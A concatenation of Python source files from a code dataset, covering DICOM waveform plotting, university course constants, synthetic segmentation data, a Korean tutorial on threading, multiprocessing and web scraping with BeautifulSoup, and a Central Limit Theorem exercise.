numpy as np\n\n\ndef wave_analysis(dicom_data):\n wave = dicom_data[0x5400, 0x0100][0][0x5400, 0x1010].value\n wave = [wave[i] for i in range(len(wave))]\n wave = np.array(wave[::2] - np.min(wave[::2]))\\\n / np.max(wave[::2] - np.min(wave[::2])) * 100\n freq = dicom_data[0x5400, 0x0100][0][0x003a, 0x001a].value\n wave_samples = dicom_data[0x5400, 0x0100][0][0x003a, 0x0010].value\n wave_time = [i / freq for i in range(wave_samples)]\n wave = np.delete(wave, len(wave)-1)\n wave_time = np.delete(wave_time, 0)\n return wave, wave_time\n # return wave, wave_time, wave_raw, wave_time_raw\n\n\nif __name__ == \"__main__\":\n import pydicom\n import matplotlib.pyplot as plt\n\n dicom_file = \"../710509.dcm\"\n dicom = pydicom.dcmread(dicom_file)\n wave, wave_time = wave_analysis(dicom)\n print(wave)\n print(wave_time)\n plt.plot(wave_time, wave, \"o\")\n plt.show()\n","repo_name":"kfuka/RemoaQt","sub_path":"wave_analysis.py","file_name":"wave_analysis.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33526894385","text":"# © 2023 App Development Club @ Oregon State Unviersity\n# All Rights Reserved\n\n# Miscellaneous constants used throughout the project\n# - course_map used to map the course number to the course name\n# - data_map used to map the data to the course number\n\ncourse_map = {\n \"101\": \"Computers: Apps & Implications\",\n \"161\": \"Introduction to Computer Science I\",\n \"162\": \"Introduction to Computer Science II\",\n \"225\": \"Discrete Structures in CS\",\n \"261\": \"Data Structures\",\n \"271\": \"Computer Architecture & Assembly Langugage\",\n \"290\": \"Web Development\",\n \"321\": \"Intro to Theory of Computation\",\n \"325\": \"Analysis of Algorithms\",\n \"331\": \"Intro Artificial Intelligence\",\n \"340\": \"Introduction to Databases\",\n \"352\": \"Intro to Usability Engineering\",\n \"361\": \"Software Engineering I\",\n \"362\": \"Software Engineering II\",\n \"370\": \"Introduction to Security\",\n \"373\": \"Defense Against the Dark Arts\",\n \"374\": \"Operating Systems I\",\n \"381\": \"Programming Language Fundamentals\",\n \"391\": \"Social & Ethical Issues in Computer Science\",\n \"399\": \"ST/Pathways to EECS\",\n \"406\": \"Projects\",\n \"434\": \"Machine Learning & Data Mining\",\n \"444\": \"Operating Systems II\",\n \"450\": \"Intro to Computer Graphics\",\n \"453\": \"Scientific Visualization\",\n \"461\": \"Senior Software Engineering Project\",\n \"464\": \"Open Source Software\",\n \"467\": \"Online Capstone Project\",\n \"468\": \"Inclusive Design (HCI)\",\n \"469\": \"Real-World Project Mgmt in CS\",\n \"472\": \"Computer Architecture\",\n \"493\": \"Cloud Application Development\",\n \"499\": \"ST/Empirical Computer Security\",\n \"501\": \"Research\",\n \"510\": \"Occupational Internship\",\n \"511\": \"Programming & Data Structures\",\n \"514\": \"Algorithms\",\n \"515\": \"Algorithms & Data Structures\",\n \"544\": \"Operating Systems II\",\n \"550\": \"Intro to Computer Graphics\",\n \"552\": \"Computer Animation\",\n \"553\": \"Scientific Visualization\",\n \"559\": \"ST/Digital Image Processing\",\n \"568\": \"Inclusive Design (HCI)\",\n \"572\": \"Computer Architecture\",\n \"579\": \"ST/Empirical Computer Security\",\n \"ECE271\": \"Digital Logic Design\",\n \"ECE322\": \"Electronics I\",\n \"ECE341\": \"Junior Design I\",\n \"ECE351\": \"Signals and Systems I\",\n \"ECE372\": \"Intro to Computer Networks\",\n \"ECE375\": 
\"Computer Org & Assembly Lang\",\n \"ECE390\": \"Electric and Magnetic Fields\",\n \"ECE399\": \"ST/Pathways to EECS\",\n \"ECE416\": \"Electronic Materials & Devices\",\n \"ECE422\": \"CMOS Integrated Circuits I\",\n \"ECE431\": \"Power Electronics\",\n \"ECE433\": \"Power System Analysis\",\n \"ECE451\": \"Systems Dynamics and Control\",\n \"ECE461\": \"Analog & Digital Communication\",\n \"ECE464\": \"Digital Signal Processing\",\n \"ECE468\": \"Digital Image Processing\",\n \"ECE472\": \"Computer Architecture\",\n \"ECE473\": \"Microcontroller System Design\",\n \"ECE499\": \"ST/Printed & Flexible Electron\",\n \"ECE516\": \"Electronic Materials & Devices\",\n \"ECE522\": \"CMOS Integrated Circuits I\",\n \"ECE530\": \"Contemp Energy Applications\",\n \"ECE531\": \"Power Electronics\",\n \"ECE533\": \"Power System Analysis\",\n \"ECE560\": \"Stochastic Signals & Systems\",\n \"ECE561\": \"Analog & Digital Communication\",\n \"ECE564\": \"Digital Signal Processing\",\n \"ECE565\": \"Estimation, Filtering, Detect\",\n \"ECE569\": \"Convex Optimization\",\n \"ECE572\": \"Computer Architecture\",\n \"ECE573\": \"Microcontroller System Design\",\n \"ECE580\": \"Network Theory\",\n \"ECE590\": \"Analytical Techqs in Electroma\",\n \"ECE599\": \"ST/Printed & Flexible Electron\",\n \"ECE614\": \"Semiconductors\",\n \"ECE621\": \"Radio Frequency IC Design\",\n}\n\ndata_map = [\n {\n \"index\": \"cs325-index\",\n \"filename\": \"CS325_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"325\",\n \"course_name\": \"Analysis of Algorithms\",\n },\n {\n \"index\": \"cs321-index\",\n \"filename\": \"CS321_UN.pdf\",\n \"term\": \"unknown\",\n \"crn\": \"321\",\n \"course_name\": \"Intro to Theory of Computation\",\n },\n {\n \"index\": \"cs370-index\",\n \"filename\": \"CS370_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"370\",\n \"course_name\": \"Introduction to Security\",\n },\n {\n \"index\": \"cs271-index\",\n \"filename\": \"CS271_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"271\",\n \"course_name\": \"Computer Architecture & Assembly Langugage\",\n },\n {\n \"index\": \"cs261-index\",\n \"filename\": \"CS261_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"261\",\n \"course_name\": \"Data Structures\",\n },\n {\n \"index\": \"cs290-index\",\n \"filename\": \"CS290_S22.pdf\",\n \"term\": \"S22\",\n \"crn\": \"290\",\n \"course_name\": \"Web Development\",\n },\n {\n \"index\": \"cs225-index\",\n \"filename\": \"CS225_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"225\",\n \"course_name\": \"Discrete Structures in CS\",\n },\n {\n \"index\": \"cs372-index\",\n \"filename\": \"CS372_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"372\",\n \"course_name\": \"Intro to Computer Networks\",\n },\n {\n \"index\": \"cs362-index\",\n \"filename\": \"CS362_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"362\",\n \"course_name\": \"Software Engineering II\",\n },\n {\n \"index\": \"cs461-index\",\n \"filename\": \"CS461_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"461\",\n \"course_name\": \"Senior Software Engineering Project\",\n },\n {\n \"index\": \"cs361-index\",\n \"filename\": \"CS361_F23.docx\",\n \"term\": \"unknown\",\n \"crn\": \"361\",\n \"course_name\": \"Software Engineering I\",\n },\n {\n \"index\": \"cs373-index\",\n \"filename\": \"CS373_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"373\",\n \"course_name\": \"Defense Against the Dark Arts\",\n },\n {\n \"index\": \"cs161-index\",\n \"filename\": \"CS161_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"161\",\n \"course_name\": \"Introduction to Computer 
Science I\",\n },\n {\n \"index\": \"cs340-index\",\n \"filename\": \"CS340_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"340\",\n \"course_name\": \"Introduction to Databases\",\n },\n {\n \"index\": \"cs464-index\",\n \"filename\": \"CS464_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"464\",\n \"course_name\": \"Open Source Software\",\n },\n {\n \"index\": \"cs444-index\",\n \"filename\": \"CS444_S22.pdf\",\n \"term\": \"S22\",\n \"crn\": \"444\",\n \"course_name\": \"Operating Systems II\",\n },\n {\n \"index\": \"cs493-index\",\n \"filename\": \"CS493_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"493\",\n \"course_name\": \"Cloud Application Development\",\n },\n {\n \"index\": \"cs467-index\",\n \"filename\": \"CS467_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"467\",\n \"course_name\": \"Online Capstone Project\",\n },\n {\n \"index\": \"cs391-index\",\n \"filename\": \"CS391_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"391\",\n \"course_name\": \"Social & Ethical Issues in Computer Science\",\n },\n {\n \"index\": \"cs381-index\",\n \"filename\": \"CS381_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"381\",\n \"course_name\": \"Programming Language Fundamentals\",\n },\n {\n \"index\": \"cs162-index\",\n \"filename\": \"CS162_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"162\",\n \"course_name\": \"Introduction to Computer Science II\",\n },\n {\n \"index\": \"cs450-index\",\n \"filename\": \"CS450_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"450\",\n \"course_name\": \"Intro to Computer Graphics\",\n },\n {\n \"index\": \"cs352-index\",\n \"filename\": \"CS352_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"352\",\n \"course_name\": \"Intro to Usability Engineering\",\n },\n]\n","repo_name":"OSU-App-Club/beavsAI-AI","sub_path":"server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2169927360","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport scipy\nimport scipy.stats\nimport random\nimport ipdb\n\nobj_dir = '/home/zeng/data/datasets/obj_mr_msk_crf'\nbg_dir = '/home/zeng/data/datasets/bg'\noutput_dir_img = '/home/zeng/data/datasets/syn_seg_mr/images'\noutput_dir_msk = '/home/zeng/data/datasets/syn_seg_mr/masks'\n\n\nif not os.path.exists(output_dir_img):\n os.mkdir(output_dir_img)\nif not os.path.exists(output_dir_msk):\n os.mkdir(output_dir_msk)\n\nobj_names = os.listdir(obj_dir)\nbg_names = os.listdir(bg_dir)\n\npalette = [0, 0, 0, 128, 0, 0, 0, 128, 0, 128, 128, 0, 0, 0, 128, 128, 0, 128, 0, 128, 128,\n 128, 128, 128, 64, 0, 0, 192, 0, 0, 64, 128, 0, 192, 128, 0, 64, 0, 128, 192, 0, 128,\n 64, 128, 128, 192, 128, 128, 0, 64, 0, 128, 64, 0, 0, 192, 0, 128, 192, 0, 0, 64, 128]\nzero_pad = 256 * 3 - len(palette)\nfor i in range(zero_pad):\n palette.append(0)\n\n\n# for obj_name, bg_name in zip(obj_names, bg_names):\ndef proc_one(bg_name, num):\n #ii = np.random.normal(loc=2, scale=1)\n ii = 1\n ii = 1 if ii <=0 else ii\n bg = Image.open(os.path.join(bg_dir, bg_name))\n sbc, sbr = bg.size\n ratio = 400.0 / max(sbr, sbc)\n bg = bg.resize((int(sbc * ratio), int(sbr * ratio)))\n bg = np.array(bg, dtype=np.uint8)\n r, c, _ = bg.shape\n mask = np.zeros((bg.shape[0], bg.shape[1], 1), dtype=np.uint8)\n locs = np.linspace(0, 1, ii+2)[1:-1]\n for i in range(ii):\n obj_name = random.choice(obj_names)\n obj = Image.open(os.path.join(obj_dir, obj_name))\n r_location = scipy.stats.norm.rvs(locs[i]-0.25, 0.2, size=1)[0] * r\n r_location = 
int(r_location)\n r_location = max(0, r_location)\n r_location = min(r_location, r - 1)\n\n c_location = scipy.stats.norm.rvs(locs[i]-0.25, 0.2, size=1)[0] * c\n c_location = int(c_location)\n c_location = max(0, c_location)\n c_location = min(c_location, c - 1)\n length = scipy.stats.norm.rvs(0.5, 0.07, size=1)[0] * max(r, c)\n length = max(length, 10)\n\n sbc, sbr = obj.size\n ratio = length / max(sbr, sbc)\n obj = obj.resize((int(sbc * ratio), int(sbr * ratio)))\n sbc, sbr = obj.size\n\n r_location_end = min(r_location + sbr, r)\n c_location_end = min(c_location + sbc, c)\n\n obj_r_end = min(r_location_end - r_location, sbr)\n obj_c_end = min(c_location_end - c_location, sbc)\n\n obj = np.array(obj, dtype=np.uint8)\n m_obj = obj[:, :, 3]\n m_obj[m_obj != 0] = 1\n m_obj = np.expand_dims(m_obj, 2)\n obj = obj[:, :, :3]\n\n bg[r_location:r_location_end, c_location:c_location_end] = \\\n bg[r_location:r_location_end, c_location:c_location_end] * (1 - m_obj[:obj_r_end, :obj_c_end]) \\\n + obj[:obj_r_end, :obj_c_end] * m_obj[:obj_r_end, :obj_c_end]\n mask[r_location:r_location_end, c_location:c_location_end] = \\\n mask[r_location:r_location_end, c_location:c_location_end] * (1-m_obj[:obj_r_end, :obj_c_end]) \\\n + (i+1)*m_obj[:obj_r_end, :obj_c_end]\n bg = Image.fromarray(bg)\n bg.save(os.path.join(output_dir_img, '{}_{}.jpg'.format( bg_name[:-4], num)))\n mask = mask[:, :, 0]\n mask = Image.fromarray(mask)\n mask = mask.convert('P')\n mask.putpalette(palette)\n mask.save(os.path.join(output_dir_msk, '{}_{}.png'.format( bg_name[:-4], num)))\n\n\nif __name__ == \"__main__\":\n for i in range(3000):\n bg_name = random.choice(bg_names)\n proc_one(bg_name, i)\n","repo_name":"ZHongshuang/mws","sub_path":"syn_msk.py","file_name":"syn_msk.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11448520155","text":"# crawling.py\r\n\r\n# 스레드 Thread\r\n# 스레드를 쓰지 않은경우\r\n# import time\r\n# def doing() :\r\n# time.sleep(1) # 1초 마다 멈춰라\r\n# print(\"실행중\")\r\n#\r\n# start = time.time()\r\n# for i in range(10) : # 10번반복\r\n# doing()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start)) # 반복이 끝난후 시간 표시\r\n\r\n# 스레드를 사용하여 처리한 경우\r\nimport time\r\nimport threading\r\n# def doing() :\r\n# time.sleep(1)\r\n# print(\"쓰레드 실행중\")\r\n# # 메인도 쓰레드 이기에 메인도 만들어주어야함\r\n# if __name__ == \"__main__\" :\r\n# start = time.time() # 실행전 저장\r\n# # 조인이라는 메소드를 실행 해 주어야함\r\n# # 반복문으로 돌림, 쓰레드를 리스트로 담음\r\n# threads = []\r\n# for i in range(10) :\r\n# t = threading.Thread(target=doing) # run이라는 메소드가 있지만 파이썬은 아무거나 정해주면됨\r\n# t.start() # 실행 대기 상태\r\n# threads.append(t)\r\n# for thread in threads :\r\n# thread.join()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n \r\n#-------------------------------------------------------------------------\r\n\r\n# 조인을 안부를 수 있게하는 방법이 있음\r\n# 동시\r\n# concurrent\r\nfrom concurrent import futures # start() join을 자동으로 처리\r\n# def doing() :\r\n# time.sleep(1)\r\n# return \"스레드 실행중\" # 리턴 시켜줌\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# results = []\r\n# with futures.ThreadPoolExecutor() as excutor :\r\n# for i in range(10) :\r\n# result = excutor.submit(doing)\r\n# results.append(result)\r\n# for f in futures.as_completed(results) :\r\n# print(f.result())\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n \r\n#---------------------------------------------------------------------------\r\n\r\n# 쓰레드를 사용하지않음\r\n# 연산\r\n# 멀티프로세스\r\n# def calc_sum(list) :\r\n# 
sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# # 넘어온 값만큼 sum을 계산\r\n# sum += i\r\n# return sum\r\n# if __name__ == \"__main__\" :\r\n# start = time.perf_counter() # time.time() 써도 상관 없음, 기능은 똑같음\r\n# result = calc_sum([1, 100000000]) # 실행시간이 길라면 숫자를 크게 주면됨\r\n# print(result)\r\n# end = time.perf_counter()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#---------------------------------------------------------------------------\r\n\r\n# 쓰레드로 처리\r\n# def calc_sum(list):\r\n# sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# sum += i\r\n# return sum\r\n# if __name__ == \"__main__\" :\r\n# # start(), join() 뺄거임\r\n# start = time.time()\r\n# with futures.ThreadPoolExecutor() as excutor :\r\n# # 2차원 배열로 만들것임\r\n# sub = [ [1, 100000000//2], [100000000//2 + 1, 100000000] ] # 리스트로 던지는것이 시작위치와 끝 위치, index로 주기에 정수가나와야함 // 두개 써줘야함\r\n# results = excutor.map(calc_sum, sub) # 알아서 처리함\r\n# print(sum(results))\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 멀티프로세스\r\nfrom multiprocessing import Pool\r\n# def calc_sum(list):\r\n# sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# sum += i\r\n# print(sum)\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# sub = [ [1, 100000000//2], [100000000//2 + 1, 100000000] ]\r\n# pool = Pool(processes=2) # 프로세스를 몇개를 쓸것인지 정해줌\r\n# pool.map(calc_sum, sub)\r\n# pool.close() # 썻기에 닫아주어야함\r\n# pool.join()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 쓰레드 동기화\r\n# 두개를 동시에 처리하면서 공유하는 변수가 있어야함\r\n# 전역변수로 변수 생성\r\n\r\n# number = 0\r\n# def thread1(num):\r\n# global number\r\n# for i in range(num+1) :\r\n# number += 1\r\n#\r\n# def thread2(num):\r\n# global number\r\n# for i in range(num+1) :\r\n# number += 1\r\n#\r\n# # 쓰레드 처리\r\n# if __name__ == \"__main__\" :\r\n# threads = [] # 쓰레드 들을 담을 리스트\r\n# start = time.time()\r\n# t1 = threading.Thread(target=thread1, args=(50000000,))\r\n# t1.start()\r\n# threads.append(t1)\r\n# t2 = threading.Thread(target=thread2, args=(50000000,))\r\n# t2.start()\r\n# threads.append(t2)\r\n# for thread in threads :\r\n# thread.join()\r\n# print(number)\r\n# end = time.time()\r\n# print(\"실행시간 :\", (end-start))\r\n \r\n#------------------------------------------------------------------------\r\n\r\n# 쓰레드의 충돌 방지\r\n# 쓰레드 동기화\r\n# number = 0\r\n# lock = threading.Lock()\r\n# def thread1(num):\r\n# global number\r\n# lock.acquire() # 다른 스레드의 접근을 금지하도록 락을 걸어줌\r\n# for i in range(num) :\r\n# number += 1\r\n# lock.release() # 작업이 끝났기 때문에 락을 풀어줌\r\n# def thread2(num):\r\n# global number\r\n# lock.acquire() # 다른 스레드의 접근을 금지하도록 락을 걸어줌\r\n# for i in range(num) :\r\n# number += 1\r\n# lock.release() # 작업이 끝났기 때문에 락을 풀어줌\r\n# # 쓰레드 처리\r\n# if __name__ == \"__main__\" :\r\n# threads = [] # 쓰레드 들을 담을 리스트\r\n# start = time.time()\r\n# t1 = threading.Thread(target=thread1, args=(50000000,))\r\n# t1.start()\r\n# threads.append(t1)\r\n# t2 = threading.Thread(target=thread2, args=(50000000,))\r\n# t2.start()\r\n# threads.append(t2)\r\n# for thread in threads :\r\n# thread.join()\r\n# print(number)\r\n# end = time.time()\r\n# print(\"실행시간 :\", (end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 멀티프로세스 동기화\r\n# 공유하는 변수가 있을경우 멀티 프로세스도 동기화를 해주어야함\r\n# from multiprocessing import shared_memory, Semaphore, Process\r\n# import numpy as np\r\n# def calc_sum(id, number, shm, arr, sem): # 매개변수를 여러개 받아줌, 
쓰레드의 이름이 넘어옴\r\n# # id 스레드 번호\r\n# # number 최대값\r\n# # shm 공유메모리(셰어드메모리)\r\n# # arr numpy.array배열\r\n# # sem 세마포어\r\n# sum = 0\r\n# for i in range(number) :\r\n# sum += 1\r\n# sem.acquire() # 세마포어 획득, 임계영역에 들어감, 임계영역은 무조건 (쓰레드)1개밖에 못들어감, 하지만 세마포어는 여러개가 가능함\r\n# # 세마포어는 자리하나를 차지했다는 개념이라, 충돌안나게 처리해줌\r\n# new_shm = shared_memory.SharedMemory(name=shm) # 공유매모리를 사용할 수 있게 가져옴\r\n# tmp_arr = np.ndarray(arr.shape, dtype=arr.dtype, buffer=new_shm.buf) # 넘겨받은 갯수만큼 받아라, 넘겨받은 array의 dtype, 임시기억장소\r\n# tmp_arr[0] += sum # 쓰레드 들이 계산한 값을 누적해야함\r\n# sem.release() # 세마포어 해제\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# arr = np.array([0]) # 0을 넣어놓는 하나짜리 방 생성\r\n# # 공유 메모리이기에 메인에서 만들어서 보냄\r\n# shm = shared_memory.SharedMemory(create=True, size=arr.nbytes)\r\n# np_shm = np.ndarray(arr.shape, dtype=arr.dtype, buffer=shm.buf)\r\n# sem = Semaphore()\r\n# p1 = Process(target=calc_sum, args=(1, 50000000, shm.name, np_shm, sem)) # 다 넘어가야함\r\n# p2 = Process(target=calc_sum, args=(2, 50000000, shm.name, np_shm, sem))\r\n# p1.start()\r\n# p2.start()\r\n# p1.join()\r\n# p2.join()\r\n# end = time.time()\r\n# print(np_shm[0]) # 합계는 이곳에 들어있음\r\n# print(\"실행시간 :\", (end-start))\r\n# shm.close() # 닫다\r\n# shm.unlink() # 끊다\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n# 네트워크\r\nimport urllib.request as req\r\nfrom urllib.error import URLError\r\n# f = req.urlopen(\"http://www.daum.net\") # 먼저 열어주어야함, 링크를 주면됨\r\n# print(f.read( 100 ).decode(\"utf-8\")) # 몇 바이트 읽어올지, 디코딩 해주어야함\r\n# html 소스를 가져옴\r\n\r\n# re = req.Request(\"http://www.daum.net\")\r\n# try :\r\n# req.urlopen(re) # 오픈시 예외처리\r\n# except URLError as e :\r\n# print(e.reason)\r\n\r\n# response = req.urlopen(\"http://www.daum.net\")\r\n# print(response) # 객체가 넘어옴, 하나씩 꺼내써야함, 메소드를 통해 꺼내면됨\r\n# print(\"url :\",response.geturl())\r\n# headers = response.info() # 헤더 정보들이 넘어옴\r\n# print(\"date :\", headers[\"date\"]) # 딕셔너리\r\n# print(headers) # 많은 정보가 있음\r\n# data = response.read() # 모든 데이터를 가져옴\r\n# print(len(data)) # 데이터의 길이\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\n# # 크롤링\r\n# import urllib.request\r\n# url = \"https://cdn.topstarnews.net/news/photo/202205/14689700_790468_3839.jpg\"\r\n# savename = \"ricegood.jpg\"\r\n# urllib.request.urlretrieve(url, savename)\r\n# print(\"저장했습니다\")\r\n#\r\n# # 파일저장\r\n# url = \"http://www.google.com/robots.txt\"\r\n# txt = urllib.request.urlopen(url)\r\n# data = txt.read().decode(\"utf-8\")\r\n# # print(data) # 콘솔창 표시\r\n# with open(\"robots.txt\", \"w\", encoding=\"utf-8\") as f:\r\n# f.write(data)\r\n# print(\"저장했습니다.\")\r\n\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n# 스크랩핑\r\n# RSS -> 스크랩핑을 해라 라고 재공해주는 것, 기본은 XML, 제공해 주는것이 많지는 않음, 기상청같은경우 RSS를 이용해 크롤링 해야함\r\nimport urllib.request as req\r\nimport urllib.parse as pa # 나중에 주소와 아이디를 합치기 위함\r\n# url = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=109\"\r\nurl = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp\" # ?stnId=109 이부분은 나중에 따로 사용할 예정\r\nvalues = { # 딕셔너리로 만듬\r\n \"stnId\" : 109\r\n }\r\nparams = pa.urlencode(values)\r\nurl = url + \"?\" + params # 주소를 합침\r\n# print(url)\r\n\r\ndata = req.urlopen(url).read().decode(\"utf-8\") # 주소를 읽어들임\r\n# print(data)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n# BeauticulSoup\r\nfrom bs4 import BeautifulSoup as bs\r\nhtml = 
\"\"\"\r\n <html>\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <title>HTML Test \r\n \r\n \r\n

HTML 연습

\r\n

짜장면

\r\n

짱뽕

\r\n

탕수육

\r\n

울면

\r\n\"\"\"\r\n\r\nsoup = bs(html, \"html.parser\") # html을 자르는것\r\nprint(\"<<\" +soup.find(\"h2\").string+ \">>\") # 글자를 꺼내라\r\nprint(\"<<\" +soup.html.body.h2.string+ \">>\")\r\n\r\nh2 = soup.find(\"h2\")\r\nbody = h2.parent # body만 출력\r\n# print(body)\r\nhtml = body.parent # html 전부 출력\r\n# print(html)\r\np1 = h2.next_sibling.next_sibling\r\nprint(p1.string)\r\nnodes = body.children\r\n# for node in nodes :\r\n# print(node) # 자식 노드들이 나옴\r\n# print(node.string) # 문자열만 나옴\r\n\r\nps = soup.find_all(\"p\") # p테그 찾기\r\nfor p in ps :\r\n print(p.string)\r\n \r\np = body.findChild()\r\nprint(h2.string)\r\nprint()\r\n\r\np1 = soup.find(id=\"first\") # id가 first인것\r\nprint(p1.string)\r\n\r\np4 = soup.find(id=\"second\") # id가 second인것\r\nprint(p4.string)\r\n\r\npp = soup.find_all(class_=\"strong\") # class는 예약어 이기에 _를 포함함\r\nfor p in pp :\r\n print(p.string)\r\n \r\n \r\n# select()\r\n# select_one()\r\n# 테그 밑에 테그가 또 있어야 하는 것이 필요
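# (added note, not in the original lesson) select()/select_one() take CSS selectors, so nesting can be expressed directly; a small illustrative example:\r\n# soup.select(\"p.subject > a\") # <a> tags that are direct children of <p class=\"subject\">\r\n# soup.select(\"p a\") # <a> tags anywhere inside a <p>\r\n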

html = \"\"\"\r\n <html>\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <title>HTML 연습</title>\r\n </head>\r\n <body>\r\n <h2>웹 스크랩핑</h2>\r\n <p class=\"subject\"><a>HTML</a></p>\r\n <p class=\"subject\"><a>XML</a></p>\r\n <p class=\"subject\" id=\"name\"><a>JSON</a></p>
\r\n <p>CDATA</p>\r\n </body>\r\n </html>\r\n\"\"\"\r\nsoup = bs(html, \"html.parser\")\r\nh2 = soup.select_one(\"body h2\")\r\nprint(\"<<\" + h2.string + \">>\")\r\n\r\nps = soup.select( \".subject\" )\r\nfor p in ps :\r\n print( p.string )\r\n\r\npp = soup.select( \"body p\" )\r\nfor p in pp :\r\n print( p.string )\r\n \r\npp = soup.select( \"p a\" ) # 자손 선택자\r\nfor p in pp :\r\n print( p.string )\r\n\r\npp = soup.select( \"p > a\" ) # 자식 선택자\r\nfor p in pp :\r\n print( p.string )\r\n \r\np = soup.select_one(\"p#name\")\r\nprint(p.string)\r\n\r\np = soup.select_one(\"p.subject\")\r\nprint(p.string)\r\n#------------------------------------------------------------------------------------------------------\r\n\r\n# RSS -> 스크랩핑을 해라 라고 재공해주는 것, 기본은 XML, 제공해 주는것이 많지는 않음, 기상청같은경우 RSS를 이용해 크롤링 해야함\r\nimport urllib.request as req\r\nimport urllib.parse as pa # 나중에 주소와 아이디를 합치기 위함\r\n# url = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=109\"\r\nurl = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp\" # ?stnId=109 이부분은 나중에 따로 사용할 예정\r\nvalues = { # 딕셔너리로 만듬\r\n \"stnId\" : 109\r\n }\r\nparams = pa.urlencode(values)\r\nurl = url + \"?\" + params # 주소를 합침\r\n# print(url)\r\n\r\ndata = req.urlopen(url).read().decode(\"utf-8\") # 주소를 읽어들임\r\n# print(data) # 데이터 양이 많음\r\n\r\nwith open(\"weather.txt\", \"w\", encoding=\"utf-8\") as f : # 파일을 저장\r\n f.write(data) # 저장할 필요는 없음, 데이터 확인용\r\n\r\nsoup = bs(data , \"html.parser\") # 데이터를 자름\r\n\r\ntitle = soup.find(\"title\")\r\nprint(\"<<\" + title.string + \">>\")\r\n\r\ncities = soup.find_all(\"city\") # city를 다 뽑음\r\n# for city in cities : # 반복문으로 돌려 city 만뽑음\r\n# print(city.string)\r\n \r\ndatas = soup.find_all(\"data\") # data를 다 뽑음\r\nfor data in datas : # 반복문을 새로 돌림\r\n print(data.parent.city.string, end=\"\\t\") # city 와 data가 동일선상에 놓여있음, 출력하고 탭을함\r\n print(data.tmef.string, \"\\t\", data.wf.string, # 시간을 뽑음, 그후 탭을 한후 날씨를 뽑음\r\n \"\\t\", data.tmn.string, \"\\t\", data.tmx.string) # 최저기온과 최고기온을 뽑음\r\nprint()\r\n#------------------------------------------------------------------------------------------------------","repo_name":"2Hyeok/Django","sub_path":"network/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":14898,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17661190912","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 20 19:44:33 2013\n\n@author: joshua\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Exercise 1\n# \n# In this exercise, we demonstrate the Central Limit Theorem, where each X_i is\n# exponential.\n#\n# a. Generate 1000 random numbers from the exponential distribution where\n# lambda=6. Plot them in a histogram. This should give you an idea of what the\n# exponential distribution looks like.\n\nexponential_pop = np.array([np.random.exponential(1/6.) for i in range(1000)])\n# plt.hist(exponential_pop)\n\n# b - e have been combined since they all go together in practice.\n#\n# b. For n = 2 generate a thousand n sized-samples from the previously cited \n# distribution. Compute the sample mean of the n numbers and standardize it \n# using the true mean and standard deviation of the distribution. Repeat for \n# n = 10, 20, and 100. Put all four in plots.\n\ntrue_mean = 1/6.\ntrue_std = 1 / 6. # the standard deviation of Exp(lambda) is 1/lambda (1/lambda**2 is the variance)\n\ndef standardize(number):\n return (number - true_mean) / true_std\n
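# (Added note, an assumption going beyond the exercise text: to get unit-variance\n# histograms, the sample mean should be scaled by sqrt(n), i.e.\n# z = (x_bar - true_mean) / (true_std / np.sqrt(n));\n# with the plain standardize() above, the histograms still turn bell-shaped as the\n# CLT predicts, but their spread shrinks as the sample size grows.)\n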
